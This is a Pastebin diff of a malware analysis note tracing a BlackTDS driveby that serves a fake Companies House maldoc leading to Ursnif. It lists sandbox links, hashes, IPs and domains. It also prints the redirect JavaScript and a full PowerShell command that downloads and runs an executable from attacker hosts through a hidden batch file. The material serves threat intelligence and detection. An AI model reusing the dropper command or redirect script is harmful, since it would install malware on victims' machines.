SHOW:
|
|
- or go back to the newest paste.
1 | - | [] |
1 | + | [BlackTDS Driveby Maldoc leads to Ursnif] |
2 | == | |
3 | ||
4 | - | [][1] |
4 | + | [Maldoc - B1F7B208ACA0DE0CC28B547CD73EE980] |
5 | - | [1]: |
5 | + | [https://app.any.run/tasks/33b1d89a-3e96-4165-8020-16a5548f15e4][1] |
6 | [1]:https://app.any.run/tasks/33b1d89a-3e96-4165-8020-16a5548f15e4 | |
7 | - | [] |
7 | + | |
8 | [Payload - 8cac839accda5f125d5f5d7226e4db92] | |
9 | [https://app.any.run/tasks/2a064aed-3e5a-4690-87e7-78da4435352c][1] | |
10 | [1]:https://app.any.run/tasks/2a064aed-3e5a-4690-87e7-78da4435352c | |
11 | ||
12 | [BlackTDS] | |
13 | -- | |
14 | celsiumoftesla.cf GET / HTTP/1.1 | |
15 | 94.23.47.105 GET /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1 | |
16 | ||
17 | [BlackTDS JavaScript] | |
18 | -- | |
19 | <style> html, body { margin: 0; padding: 0; height : 100%; } </style> | |
20 | <script type="text/javascript"> | |
21 | document.write('\<script type=\'text/javascript\'\>location = \'http://94.23.47.105/documents/4d75b248-19f0-4539-9d7c-659f1b9.doc\';\</script\>'); | |
22 | </script> | |
23 | <iframe src="" style="display:block; width:100%; height:100%; border:none; margin:0; padding:0;"></iframe><span style="visibility: hidden"><a href="/insert">j2B7wKaXk658V</a><a href="/register">3xfgzc1roc</a></span> | |
24 | ||
25 | [Maldoc - fake Companies House] | |
26 | -- | |
27 | 94.23.47.105 OPTIONS /documents/ HTTP/1.1 | |
28 | 94.23.47.105 OPTIONS /documents/ HTTP/1.1 | |
29 | 94.23.47.105 OPTIONS /documents/ HTTP/1.1 | |
30 | 94.23.47.105 HEAD /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1 | |
31 | 94.23.47.105 OPTIONS / HTTP/1.1 | |
32 | 94.23.47.105 HEAD /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1 | |
33 | 94.23.55.137 GET /docs/content.bin HTTP/1.1 | |
34 | ||
35 | http://allhealthsol.com/data/content.bin | |
36 | ||
37 | [Maldoc PowerShell] | |
38 | -- | |
39 | PowerShell "'PowerShell ""<#4ex#>function func459drt([String]$snew) { (New-Object System.Net.WebClient).DownloadFile($snew,''C:\Users\admin\AppData\Local\Temp\Rjdeoo.exe'');<#Secex#>Start-Process ''C:\Users\admin\AppData\Local\Temp\Rjdeoo.exe'';} <#Start and read data#> try{ func459drt ''http://94.23.55.137/docs/content.bin'' } catch { func459drt ''http://allhealthsol.com/data/content.bin''}'"" | Out-File -encoding ASCII -FilePath C:\Users\admin\AppData\Local\Temp\okecrhm.bat; Start-Process 'C:\Users\admin\AppData\Local\Temp\okecrhm.bat' -WindowStyle Hidden" | |
40 | ||
41 | ||
42 | [Ursnif Rjdeoo.exe] | |
43 | -- | |
44 | https://86.105.18.236/index.html | |
45 | ||
46 | ||
47 | ||
48 | *** | |
49 | ![Pastebin Logo][image] | |
50 | ||
51 | [image]: https://zerophagemalware.files.wordpress.com/2017/09/zerophageicon2.png |